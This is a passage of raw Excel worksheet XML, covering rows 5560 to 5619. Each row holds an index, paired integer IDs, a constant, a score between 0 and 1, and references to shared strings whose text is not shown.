      <c r="H5560" t="s">
        <v>10997</v>
      </c>
    </row>
    <row r="5561" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5561" s="1">
        <v>5559</v>
      </c>
      <c r="B5561">
        <v>6599</v>
      </c>
      <c r="C5561">
        <v>6599</v>
      </c>
      <c r="D5561">
        <v>3</v>
      </c>
      <c r="E5561">
        <v>0.84859997034072876</v>
      </c>
      <c r="F5561" t="s">
        <v>10120</v>
      </c>
      <c r="G5561" t="s">
        <v>10998</v>
      </c>
      <c r="H5561" t="s">
        <v>10999</v>
      </c>
    </row>
    <row r="5562" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5562" s="1">
        <v>5560</v>
      </c>
      <c r="B5562">
        <v>6250</v>
      </c>
      <c r="C5562">
        <v>6250</v>
      </c>
      <c r="D5562">
        <v>3</v>
      </c>
      <c r="E5562">
        <v>0.68699997663497925</v>
      </c>
      <c r="F5562" t="s">
        <v>10120</v>
      </c>
      <c r="G5562" t="s">
        <v>11000</v>
      </c>
      <c r="H5562" t="s">
        <v>11001</v>
      </c>
    </row>
    <row r="5563" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5563" s="1">
        <v>5561</v>
      </c>
      <c r="B5563">
        <v>6249</v>
      </c>
      <c r="C5563">
        <v>6249</v>
      </c>
      <c r="D5563">
        <v>3</v>
      </c>
      <c r="E5563">
        <v>0.69950002431869507</v>
      </c>
      <c r="F5563" t="s">
        <v>10120</v>
      </c>
      <c r="G5563" t="s">
        <v>11002</v>
      </c>
      <c r="H5563" t="s">
        <v>11003</v>
      </c>
    </row>
    <row r="5564" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5564" s="1">
        <v>5562</v>
      </c>
      <c r="B5564">
        <v>5908</v>
      </c>
      <c r="C5564">
        <v>5908</v>
      </c>
      <c r="D5564">
        <v>3</v>
      </c>
      <c r="E5564">
        <v>0.54989999532699585</v>
      </c>
      <c r="F5564" t="s">
        <v>10120</v>
      </c>
      <c r="G5564" t="s">
        <v>11004</v>
      </c>
      <c r="H5564" t="s">
        <v>11005</v>
      </c>
    </row>
    <row r="5565" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5565" s="1">
        <v>5563</v>
      </c>
      <c r="B5565">
        <v>5754</v>
      </c>
      <c r="C5565">
        <v>5754</v>
      </c>
      <c r="D5565">
        <v>3</v>
      </c>
      <c r="E5565">
        <v>0.38629999756813049</v>
      </c>
      <c r="F5565" t="s">
        <v>10120</v>
      </c>
      <c r="G5565" t="s">
        <v>11006</v>
      </c>
      <c r="H5565" t="s">
        <v>11007</v>
      </c>
    </row>
    <row r="5566" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5566" s="1">
        <v>5564</v>
      </c>
      <c r="B5566">
        <v>6601</v>
      </c>
      <c r="C5566">
        <v>6601</v>
      </c>
      <c r="D5566">
        <v>3</v>
      </c>
      <c r="E5566">
        <v>0.62840002775192261</v>
      </c>
      <c r="F5566" t="s">
        <v>10120</v>
      </c>
      <c r="G5566" t="s">
        <v>11008</v>
      </c>
      <c r="H5566" t="s">
        <v>11009</v>
      </c>
    </row>
    <row r="5567" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5567" s="1">
        <v>5565</v>
      </c>
      <c r="B5567">
        <v>6849</v>
      </c>
      <c r="C5567">
        <v>6849</v>
      </c>
      <c r="D5567">
        <v>3</v>
      </c>
      <c r="E5567">
        <v>0.98589998483657837</v>
      </c>
      <c r="F5567" t="s">
        <v>10120</v>
      </c>
      <c r="G5567" t="s">
        <v>11010</v>
      </c>
      <c r="H5567" t="s">
        <v>11011</v>
      </c>
    </row>
    <row r="5568" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5568" s="1">
        <v>5566</v>
      </c>
      <c r="B5568">
        <v>6603</v>
      </c>
      <c r="C5568">
        <v>6603</v>
      </c>
      <c r="D5568">
        <v>3</v>
      </c>
      <c r="E5568">
        <v>0.98960000276565552</v>
      </c>
      <c r="F5568" t="s">
        <v>10120</v>
      </c>
      <c r="G5568" t="s">
        <v>11012</v>
      </c>
      <c r="H5568" t="s">
        <v>11013</v>
      </c>
    </row>
    <row r="5569" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5569" s="1">
        <v>5567</v>
      </c>
      <c r="B5569">
        <v>7546</v>
      </c>
      <c r="C5569">
        <v>7546</v>
      </c>
      <c r="D5569">
        <v>3</v>
      </c>
      <c r="E5569">
        <v>0.99519997835159302</v>
      </c>
      <c r="F5569" t="s">
        <v>10120</v>
      </c>
      <c r="G5569" t="s">
        <v>11014</v>
      </c>
      <c r="H5569" t="s">
        <v>11015</v>
      </c>
    </row>
    <row r="5570" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5570" s="1">
        <v>5568</v>
      </c>
      <c r="B5570">
        <v>7545</v>
      </c>
      <c r="C5570">
        <v>7545</v>
      </c>
      <c r="D5570">
        <v>3</v>
      </c>
      <c r="E5570">
        <v>0.99779999256134033</v>
      </c>
      <c r="F5570" t="s">
        <v>10120</v>
      </c>
      <c r="G5570" t="s">
        <v>11016</v>
      </c>
      <c r="H5570" t="s">
        <v>11017</v>
      </c>
    </row>
    <row r="5571" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5571" s="1">
        <v>5569</v>
      </c>
      <c r="B5571">
        <v>7544</v>
      </c>
      <c r="C5571">
        <v>7544</v>
      </c>
      <c r="D5571">
        <v>3</v>
      </c>
      <c r="E5571">
        <v>0.98549997806549072</v>
      </c>
      <c r="F5571" t="s">
        <v>10120</v>
      </c>
      <c r="G5571" t="s">
        <v>11018</v>
      </c>
      <c r="H5571" t="s">
        <v>11019</v>
      </c>
    </row>
    <row r="5572" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5572" s="1">
        <v>5570</v>
      </c>
      <c r="B5572">
        <v>7543</v>
      </c>
      <c r="C5572">
        <v>7543</v>
      </c>
      <c r="D5572">
        <v>3</v>
      </c>
      <c r="E5572">
        <v>0.99629998207092285</v>
      </c>
      <c r="F5572" t="s">
        <v>10120</v>
      </c>
      <c r="G5572" t="s">
        <v>11020</v>
      </c>
      <c r="H5572" t="s">
        <v>11021</v>
      </c>
    </row>
    <row r="5573" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5573" s="1">
        <v>5571</v>
      </c>
      <c r="B5573">
        <v>7541</v>
      </c>
      <c r="C5573">
        <v>7541</v>
      </c>
      <c r="D5573">
        <v>3</v>
      </c>
      <c r="E5573">
        <v>0.99809998273849487</v>
      </c>
      <c r="F5573" t="s">
        <v>10120</v>
      </c>
      <c r="G5573" t="s">
        <v>11022</v>
      </c>
      <c r="H5573" t="s">
        <v>11023</v>
      </c>
    </row>
    <row r="5574" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5574" s="1">
        <v>5572</v>
      </c>
      <c r="B5574">
        <v>7540</v>
      </c>
      <c r="C5574">
        <v>7540</v>
      </c>
      <c r="D5574">
        <v>3</v>
      </c>
      <c r="E5574">
        <v>0.77209997177124023</v>
      </c>
      <c r="F5574" t="s">
        <v>10120</v>
      </c>
      <c r="G5574" t="s">
        <v>11024</v>
      </c>
      <c r="H5574" t="s">
        <v>11025</v>
      </c>
    </row>
    <row r="5575" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5575" s="1">
        <v>5573</v>
      </c>
      <c r="B5575">
        <v>7539</v>
      </c>
      <c r="C5575">
        <v>7539</v>
      </c>
      <c r="D5575">
        <v>3</v>
      </c>
      <c r="E5575">
        <v>0.7598000168800354</v>
      </c>
      <c r="F5575" t="s">
        <v>10120</v>
      </c>
      <c r="G5575" t="s">
        <v>11026</v>
      </c>
      <c r="H5575" t="s">
        <v>11027</v>
      </c>
    </row>
    <row r="5576" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5576" s="1">
        <v>5574</v>
      </c>
      <c r="B5576">
        <v>7553</v>
      </c>
      <c r="C5576">
        <v>7553</v>
      </c>
      <c r="D5576">
        <v>3</v>
      </c>
      <c r="E5576">
        <v>0.98600000143051147</v>
      </c>
      <c r="F5576" t="s">
        <v>10120</v>
      </c>
      <c r="G5576" t="s">
        <v>11028</v>
      </c>
      <c r="H5576" t="s">
        <v>11029</v>
      </c>
    </row>
    <row r="5577" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5577" s="1">
        <v>5575</v>
      </c>
      <c r="B5577">
        <v>7106</v>
      </c>
      <c r="C5577">
        <v>7106</v>
      </c>
      <c r="D5577">
        <v>3</v>
      </c>
      <c r="E5577">
        <v>0.90030002593994141</v>
      </c>
      <c r="F5577" t="s">
        <v>10120</v>
      </c>
      <c r="G5577" t="s">
        <v>11030</v>
      </c>
      <c r="H5577" t="s">
        <v>11031</v>
      </c>
    </row>
    <row r="5578" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5578" s="1">
        <v>5576</v>
      </c>
      <c r="B5578">
        <v>3965</v>
      </c>
      <c r="C5578">
        <v>3965</v>
      </c>
      <c r="D5578">
        <v>3</v>
      </c>
      <c r="E5578">
        <v>0.58230000734329224</v>
      </c>
      <c r="F5578" t="s">
        <v>10120</v>
      </c>
      <c r="G5578" t="s">
        <v>11032</v>
      </c>
      <c r="H5578" t="s">
        <v>11033</v>
      </c>
    </row>
    <row r="5579" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5579" s="1">
        <v>5577</v>
      </c>
      <c r="B5579">
        <v>7931</v>
      </c>
      <c r="C5579">
        <v>7931</v>
      </c>
      <c r="D5579">
        <v>3</v>
      </c>
      <c r="E5579">
        <v>0.99709999561309814</v>
      </c>
      <c r="F5579" t="s">
        <v>10120</v>
      </c>
      <c r="G5579" t="s">
        <v>11034</v>
      </c>
      <c r="H5579" t="s">
        <v>11035</v>
      </c>
    </row>
    <row r="5580" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5580" s="1">
        <v>5578</v>
      </c>
      <c r="B5580">
        <v>3130</v>
      </c>
      <c r="C5580">
        <v>3130</v>
      </c>
      <c r="D5580">
        <v>3</v>
      </c>
      <c r="E5580">
        <v>0.60409998893737793</v>
      </c>
      <c r="F5580" t="s">
        <v>10120</v>
      </c>
      <c r="G5580" t="s">
        <v>11036</v>
      </c>
      <c r="H5580" t="s">
        <v>11037</v>
      </c>
    </row>
    <row r="5581" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5581" s="1">
        <v>5579</v>
      </c>
      <c r="B5581">
        <v>963</v>
      </c>
      <c r="C5581">
        <v>963</v>
      </c>
      <c r="D5581">
        <v>3</v>
      </c>
      <c r="E5581">
        <v>0.52660000324249268</v>
      </c>
      <c r="F5581" t="s">
        <v>10120</v>
      </c>
      <c r="G5581" t="s">
        <v>11038</v>
      </c>
      <c r="H5581" t="s">
        <v>11039</v>
      </c>
    </row>
    <row r="5582" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5582" s="1">
        <v>5580</v>
      </c>
      <c r="B5582">
        <v>961</v>
      </c>
      <c r="C5582">
        <v>961</v>
      </c>
      <c r="D5582">
        <v>3</v>
      </c>
      <c r="E5582">
        <v>0.65839999914169312</v>
      </c>
      <c r="F5582" t="s">
        <v>10120</v>
      </c>
      <c r="G5582" t="s">
        <v>11040</v>
      </c>
      <c r="H5582" t="s">
        <v>11041</v>
      </c>
    </row>
    <row r="5583" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5583" s="1">
        <v>5581</v>
      </c>
      <c r="B5583">
        <v>3144</v>
      </c>
      <c r="C5583">
        <v>3144</v>
      </c>
      <c r="D5583">
        <v>3</v>
      </c>
      <c r="E5583">
        <v>0.90710002183914185</v>
      </c>
      <c r="F5583" t="s">
        <v>10120</v>
      </c>
      <c r="G5583" t="s">
        <v>11042</v>
      </c>
      <c r="H5583" t="s">
        <v>11043</v>
      </c>
    </row>
    <row r="5584" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5584" s="1">
        <v>5582</v>
      </c>
      <c r="B5584">
        <v>3145</v>
      </c>
      <c r="C5584">
        <v>3145</v>
      </c>
      <c r="D5584">
        <v>3</v>
      </c>
      <c r="E5584">
        <v>0.96420001983642578</v>
      </c>
      <c r="F5584" t="s">
        <v>10120</v>
      </c>
      <c r="G5584" t="s">
        <v>11044</v>
      </c>
      <c r="H5584" t="s">
        <v>11045</v>
      </c>
    </row>
    <row r="5585" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5585" s="1">
        <v>5583</v>
      </c>
      <c r="B5585">
        <v>3161</v>
      </c>
      <c r="C5585">
        <v>3161</v>
      </c>
      <c r="D5585">
        <v>3</v>
      </c>
      <c r="E5585">
        <v>0.4950999915599823</v>
      </c>
      <c r="F5585" t="s">
        <v>10120</v>
      </c>
      <c r="G5585" t="s">
        <v>11046</v>
      </c>
      <c r="H5585" t="s">
        <v>11047</v>
      </c>
    </row>
    <row r="5586" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5586" s="1">
        <v>5584</v>
      </c>
      <c r="B5586">
        <v>956</v>
      </c>
      <c r="C5586">
        <v>956</v>
      </c>
      <c r="D5586">
        <v>3</v>
      </c>
      <c r="E5586">
        <v>0.85970002412796021</v>
      </c>
      <c r="F5586" t="s">
        <v>10120</v>
      </c>
      <c r="G5586" t="s">
        <v>11048</v>
      </c>
      <c r="H5586" t="s">
        <v>11049</v>
      </c>
    </row>
    <row r="5587" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5587" s="1">
        <v>5585</v>
      </c>
      <c r="B5587">
        <v>3166</v>
      </c>
      <c r="C5587">
        <v>3166</v>
      </c>
      <c r="D5587">
        <v>3</v>
      </c>
      <c r="E5587">
        <v>0.68199998140335083</v>
      </c>
      <c r="F5587" t="s">
        <v>10120</v>
      </c>
      <c r="G5587" t="s">
        <v>11050</v>
      </c>
      <c r="H5587" t="s">
        <v>11051</v>
      </c>
    </row>
    <row r="5588" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5588" s="1">
        <v>5586</v>
      </c>
      <c r="B5588">
        <v>3167</v>
      </c>
      <c r="C5588">
        <v>3167</v>
      </c>
      <c r="D5588">
        <v>3</v>
      </c>
      <c r="E5588">
        <v>0.70160001516342163</v>
      </c>
      <c r="F5588" t="s">
        <v>10120</v>
      </c>
      <c r="G5588" t="s">
        <v>11052</v>
      </c>
      <c r="H5588" t="s">
        <v>11053</v>
      </c>
    </row>
    <row r="5589" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5589" s="1">
        <v>5587</v>
      </c>
      <c r="B5589">
        <v>3168</v>
      </c>
      <c r="C5589">
        <v>3168</v>
      </c>
      <c r="D5589">
        <v>3</v>
      </c>
      <c r="E5589">
        <v>0.53259998559951782</v>
      </c>
      <c r="F5589" t="s">
        <v>10120</v>
      </c>
      <c r="G5589" t="s">
        <v>11054</v>
      </c>
      <c r="H5589" t="s">
        <v>11055</v>
      </c>
    </row>
    <row r="5590" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5590" s="1">
        <v>5588</v>
      </c>
      <c r="B5590">
        <v>3169</v>
      </c>
      <c r="C5590">
        <v>3169</v>
      </c>
      <c r="D5590">
        <v>3</v>
      </c>
      <c r="E5590">
        <v>0.89520001411437988</v>
      </c>
      <c r="F5590" t="s">
        <v>10120</v>
      </c>
      <c r="G5590" t="s">
        <v>11056</v>
      </c>
      <c r="H5590" t="s">
        <v>11057</v>
      </c>
    </row>
    <row r="5591" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5591" s="1">
        <v>5589</v>
      </c>
      <c r="B5591">
        <v>3171</v>
      </c>
      <c r="C5591">
        <v>3171</v>
      </c>
      <c r="D5591">
        <v>3</v>
      </c>
      <c r="E5591">
        <v>0.99639999866485596</v>
      </c>
      <c r="F5591" t="s">
        <v>10120</v>
      </c>
      <c r="G5591" t="s">
        <v>11058</v>
      </c>
      <c r="H5591" t="s">
        <v>11059</v>
      </c>
    </row>
    <row r="5592" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5592" s="1">
        <v>5590</v>
      </c>
      <c r="B5592">
        <v>3174</v>
      </c>
      <c r="C5592">
        <v>3174</v>
      </c>
      <c r="D5592">
        <v>3</v>
      </c>
      <c r="E5592">
        <v>0.79199999570846558</v>
      </c>
      <c r="F5592" t="s">
        <v>10120</v>
      </c>
      <c r="G5592" t="s">
        <v>11060</v>
      </c>
      <c r="H5592" t="s">
        <v>11061</v>
      </c>
    </row>
    <row r="5593" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5593" s="1">
        <v>5591</v>
      </c>
      <c r="B5593">
        <v>951</v>
      </c>
      <c r="C5593">
        <v>951</v>
      </c>
      <c r="D5593">
        <v>3</v>
      </c>
      <c r="E5593">
        <v>0.82220000028610229</v>
      </c>
      <c r="F5593" t="s">
        <v>10120</v>
      </c>
      <c r="G5593" t="s">
        <v>11062</v>
      </c>
      <c r="H5593" t="s">
        <v>11063</v>
      </c>
    </row>
    <row r="5594" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5594" s="1">
        <v>5592</v>
      </c>
      <c r="B5594">
        <v>950</v>
      </c>
      <c r="C5594">
        <v>950</v>
      </c>
      <c r="D5594">
        <v>3</v>
      </c>
      <c r="E5594">
        <v>0.50770002603530884</v>
      </c>
      <c r="F5594" t="s">
        <v>10120</v>
      </c>
      <c r="G5594" t="s">
        <v>11064</v>
      </c>
      <c r="H5594" t="s">
        <v>11065</v>
      </c>
    </row>
    <row r="5595" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5595" s="1">
        <v>5593</v>
      </c>
      <c r="B5595">
        <v>942</v>
      </c>
      <c r="C5595">
        <v>942</v>
      </c>
      <c r="D5595">
        <v>3</v>
      </c>
      <c r="E5595">
        <v>0.74800002574920654</v>
      </c>
      <c r="F5595" t="s">
        <v>10120</v>
      </c>
      <c r="G5595" t="s">
        <v>11066</v>
      </c>
      <c r="H5595" t="s">
        <v>11067</v>
      </c>
    </row>
    <row r="5596" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5596" s="1">
        <v>5594</v>
      </c>
      <c r="B5596">
        <v>941</v>
      </c>
      <c r="C5596">
        <v>941</v>
      </c>
      <c r="D5596">
        <v>3</v>
      </c>
      <c r="E5596">
        <v>0.49660000205039978</v>
      </c>
      <c r="F5596" t="s">
        <v>10120</v>
      </c>
      <c r="G5596" t="s">
        <v>11068</v>
      </c>
      <c r="H5596" t="s">
        <v>11069</v>
      </c>
    </row>
    <row r="5597" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5597" s="1">
        <v>5595</v>
      </c>
      <c r="B5597">
        <v>3127</v>
      </c>
      <c r="C5597">
        <v>3127</v>
      </c>
      <c r="D5597">
        <v>3</v>
      </c>
      <c r="E5597">
        <v>0.71810001134872437</v>
      </c>
      <c r="F5597" t="s">
        <v>10120</v>
      </c>
      <c r="G5597" t="s">
        <v>11070</v>
      </c>
      <c r="H5597" t="s">
        <v>11071</v>
      </c>
    </row>
    <row r="5598" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5598" s="1">
        <v>5596</v>
      </c>
      <c r="B5598">
        <v>935</v>
      </c>
      <c r="C5598">
        <v>935</v>
      </c>
      <c r="D5598">
        <v>3</v>
      </c>
      <c r="E5598">
        <v>0.4627000093460083</v>
      </c>
      <c r="F5598" t="s">
        <v>10120</v>
      </c>
      <c r="G5598" t="s">
        <v>11072</v>
      </c>
      <c r="H5598" t="s">
        <v>11073</v>
      </c>
    </row>
    <row r="5599" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5599" s="1">
        <v>5597</v>
      </c>
      <c r="B5599">
        <v>3125</v>
      </c>
      <c r="C5599">
        <v>3125</v>
      </c>
      <c r="D5599">
        <v>3</v>
      </c>
      <c r="E5599">
        <v>0.55659997463226318</v>
      </c>
      <c r="F5599" t="s">
        <v>10120</v>
      </c>
      <c r="G5599" t="s">
        <v>11074</v>
      </c>
      <c r="H5599" t="s">
        <v>11075</v>
      </c>
    </row>
    <row r="5600" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5600" s="1">
        <v>5598</v>
      </c>
      <c r="B5600">
        <v>3122</v>
      </c>
      <c r="C5600">
        <v>3122</v>
      </c>
      <c r="D5600">
        <v>3</v>
      </c>
      <c r="E5600">
        <v>0.7565000057220459</v>
      </c>
      <c r="F5600" t="s">
        <v>10120</v>
      </c>
      <c r="G5600" t="s">
        <v>11076</v>
      </c>
      <c r="H5600" t="s">
        <v>11077</v>
      </c>
    </row>
    <row r="5601" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5601" s="1">
        <v>5599</v>
      </c>
      <c r="B5601">
        <v>3053</v>
      </c>
      <c r="C5601">
        <v>3053</v>
      </c>
      <c r="D5601">
        <v>3</v>
      </c>
      <c r="E5601">
        <v>0.6776999831199646</v>
      </c>
      <c r="F5601" t="s">
        <v>10120</v>
      </c>
      <c r="G5601" t="s">
        <v>11078</v>
      </c>
      <c r="H5601" t="s">
        <v>11079</v>
      </c>
    </row>
    <row r="5602" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5602" s="1">
        <v>5600</v>
      </c>
      <c r="B5602">
        <v>3054</v>
      </c>
      <c r="C5602">
        <v>3054</v>
      </c>
      <c r="D5602">
        <v>3</v>
      </c>
      <c r="E5602">
        <v>0.45710000395774841</v>
      </c>
      <c r="F5602" t="s">
        <v>10120</v>
      </c>
      <c r="G5602" t="s">
        <v>11080</v>
      </c>
      <c r="H5602" t="s">
        <v>11081</v>
      </c>
    </row>
    <row r="5603" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5603" s="1">
        <v>5601</v>
      </c>
      <c r="B5603">
        <v>3066</v>
      </c>
      <c r="C5603">
        <v>3066</v>
      </c>
      <c r="D5603">
        <v>3</v>
      </c>
      <c r="E5603">
        <v>0.56950002908706665</v>
      </c>
      <c r="F5603" t="s">
        <v>10120</v>
      </c>
      <c r="G5603" t="s">
        <v>11082</v>
      </c>
      <c r="H5603" t="s">
        <v>11083</v>
      </c>
    </row>
    <row r="5604" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5604" s="1">
        <v>5602</v>
      </c>
      <c r="B5604">
        <v>3067</v>
      </c>
      <c r="C5604">
        <v>3067</v>
      </c>
      <c r="D5604">
        <v>3</v>
      </c>
      <c r="E5604">
        <v>0.97439998388290405</v>
      </c>
      <c r="F5604" t="s">
        <v>10120</v>
      </c>
      <c r="G5604" t="s">
        <v>11084</v>
      </c>
      <c r="H5604" t="s">
        <v>11085</v>
      </c>
    </row>
    <row r="5605" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5605" s="1">
        <v>5603</v>
      </c>
      <c r="B5605">
        <v>976</v>
      </c>
      <c r="C5605">
        <v>976</v>
      </c>
      <c r="D5605">
        <v>3</v>
      </c>
      <c r="E5605">
        <v>0.43000000715255737</v>
      </c>
      <c r="F5605" t="s">
        <v>10120</v>
      </c>
      <c r="G5605" t="s">
        <v>11086</v>
      </c>
      <c r="H5605" t="s">
        <v>11087</v>
      </c>
    </row>
    <row r="5606" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5606" s="1">
        <v>5604</v>
      </c>
      <c r="B5606">
        <v>974</v>
      </c>
      <c r="C5606">
        <v>974</v>
      </c>
      <c r="D5606">
        <v>3</v>
      </c>
      <c r="E5606">
        <v>0.65380001068115234</v>
      </c>
      <c r="F5606" t="s">
        <v>10120</v>
      </c>
      <c r="G5606" t="s">
        <v>11088</v>
      </c>
      <c r="H5606" t="s">
        <v>11089</v>
      </c>
    </row>
    <row r="5607" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5607" s="1">
        <v>5605</v>
      </c>
      <c r="B5607">
        <v>3069</v>
      </c>
      <c r="C5607">
        <v>3069</v>
      </c>
      <c r="D5607">
        <v>3</v>
      </c>
      <c r="E5607">
        <v>0.70340001583099365</v>
      </c>
      <c r="F5607" t="s">
        <v>10120</v>
      </c>
      <c r="G5607" t="s">
        <v>11090</v>
      </c>
      <c r="H5607" t="s">
        <v>11091</v>
      </c>
    </row>
    <row r="5608" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5608" s="1">
        <v>5606</v>
      </c>
      <c r="B5608">
        <v>3070</v>
      </c>
      <c r="C5608">
        <v>3070</v>
      </c>
      <c r="D5608">
        <v>3</v>
      </c>
      <c r="E5608">
        <v>0.96679997444152832</v>
      </c>
      <c r="F5608" t="s">
        <v>10120</v>
      </c>
      <c r="G5608" t="s">
        <v>11092</v>
      </c>
      <c r="H5608" t="s">
        <v>11093</v>
      </c>
    </row>
    <row r="5609" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5609" s="1">
        <v>5607</v>
      </c>
      <c r="B5609">
        <v>3072</v>
      </c>
      <c r="C5609">
        <v>3072</v>
      </c>
      <c r="D5609">
        <v>3</v>
      </c>
      <c r="E5609">
        <v>0.70599997043609619</v>
      </c>
      <c r="F5609" t="s">
        <v>10120</v>
      </c>
      <c r="G5609" t="s">
        <v>11094</v>
      </c>
      <c r="H5609" t="s">
        <v>11095</v>
      </c>
    </row>
    <row r="5610" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5610" s="1">
        <v>5608</v>
      </c>
      <c r="B5610">
        <v>972</v>
      </c>
      <c r="C5610">
        <v>972</v>
      </c>
      <c r="D5610">
        <v>3</v>
      </c>
      <c r="E5610">
        <v>0.98519998788833618</v>
      </c>
      <c r="F5610" t="s">
        <v>10120</v>
      </c>
      <c r="G5610" t="s">
        <v>11096</v>
      </c>
      <c r="H5610" t="s">
        <v>11097</v>
      </c>
    </row>
    <row r="5611" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5611" s="1">
        <v>5609</v>
      </c>
      <c r="B5611">
        <v>969</v>
      </c>
      <c r="C5611">
        <v>969</v>
      </c>
      <c r="D5611">
        <v>3</v>
      </c>
      <c r="E5611">
        <v>0.99659997224807739</v>
      </c>
      <c r="F5611" t="s">
        <v>10120</v>
      </c>
      <c r="G5611" t="s">
        <v>11098</v>
      </c>
      <c r="H5611" t="s">
        <v>11099</v>
      </c>
    </row>
    <row r="5612" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5612" s="1">
        <v>5610</v>
      </c>
      <c r="B5612">
        <v>968</v>
      </c>
      <c r="C5612">
        <v>968</v>
      </c>
      <c r="D5612">
        <v>3</v>
      </c>
      <c r="E5612">
        <v>0.45849999785423279</v>
      </c>
      <c r="F5612" t="s">
        <v>10120</v>
      </c>
      <c r="G5612" t="s">
        <v>11100</v>
      </c>
      <c r="H5612" t="s">
        <v>11101</v>
      </c>
    </row>
    <row r="5613" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5613" s="1">
        <v>5611</v>
      </c>
      <c r="B5613">
        <v>965</v>
      </c>
      <c r="C5613">
        <v>965</v>
      </c>
      <c r="D5613">
        <v>3</v>
      </c>
      <c r="E5613">
        <v>0.53869998455047607</v>
      </c>
      <c r="F5613" t="s">
        <v>10120</v>
      </c>
      <c r="G5613" t="s">
        <v>11102</v>
      </c>
      <c r="H5613" t="s">
        <v>11103</v>
      </c>
    </row>
    <row r="5614" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5614" s="1">
        <v>5612</v>
      </c>
      <c r="B5614">
        <v>3084</v>
      </c>
      <c r="C5614">
        <v>3084</v>
      </c>
      <c r="D5614">
        <v>3</v>
      </c>
      <c r="E5614">
        <v>0.63510000705718994</v>
      </c>
      <c r="F5614" t="s">
        <v>10120</v>
      </c>
      <c r="G5614" t="s">
        <v>11104</v>
      </c>
      <c r="H5614" t="s">
        <v>11105</v>
      </c>
    </row>
    <row r="5615" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5615" s="1">
        <v>5613</v>
      </c>
      <c r="B5615">
        <v>3087</v>
      </c>
      <c r="C5615">
        <v>3087</v>
      </c>
      <c r="D5615">
        <v>3</v>
      </c>
      <c r="E5615">
        <v>0.70090001821517944</v>
      </c>
      <c r="F5615" t="s">
        <v>10120</v>
      </c>
      <c r="G5615" t="s">
        <v>11106</v>
      </c>
      <c r="H5615" t="s">
        <v>11107</v>
      </c>
    </row>
    <row r="5616" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5616" s="1">
        <v>5614</v>
      </c>
      <c r="B5616">
        <v>3096</v>
      </c>
      <c r="C5616">
        <v>3096</v>
      </c>
      <c r="D5616">
        <v>3</v>
      </c>
      <c r="E5616">
        <v>0.866100013256073</v>
      </c>
      <c r="F5616" t="s">
        <v>10120</v>
      </c>
      <c r="G5616" t="s">
        <v>11108</v>
      </c>
      <c r="H5616" t="s">
        <v>11109</v>
      </c>
    </row>
    <row r="5617" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5617" s="1">
        <v>5615</v>
      </c>
      <c r="B5617">
        <v>3117</v>
      </c>
      <c r="C5617">
        <v>3117</v>
      </c>
      <c r="D5617">
        <v>3</v>
      </c>
      <c r="E5617">
        <v>0.57940000295639038</v>
      </c>
      <c r="F5617" t="s">
        <v>10120</v>
      </c>
      <c r="G5617" t="s">
        <v>11110</v>
      </c>
      <c r="H5617" t="s">
        <v>11111</v>
      </c>
    </row>
    <row r="5618" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5618" s="1">
        <v>5616</v>
      </c>
      <c r="B5618">
        <v>964</v>
      </c>
      <c r="C5618">
        <v>964</v>
      </c>
      <c r="D5618">
        <v>3</v>
      </c>
      <c r="E5618">
        <v>0.99360001087188721</v>
      </c>
      <c r="F5618" t="s">
        <v>10120</v>
      </c>
      <c r="G5618" t="s">
        <v>11112</v>
      </c>
      <c r="H5618" t="s">
        <v>11113</v>
      </c>
    </row>
    <row r="5619" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5619" s="1">
        <v>5617</v>
      </c>
      <c r="B5619">
        <v>3052</v>
      </c>
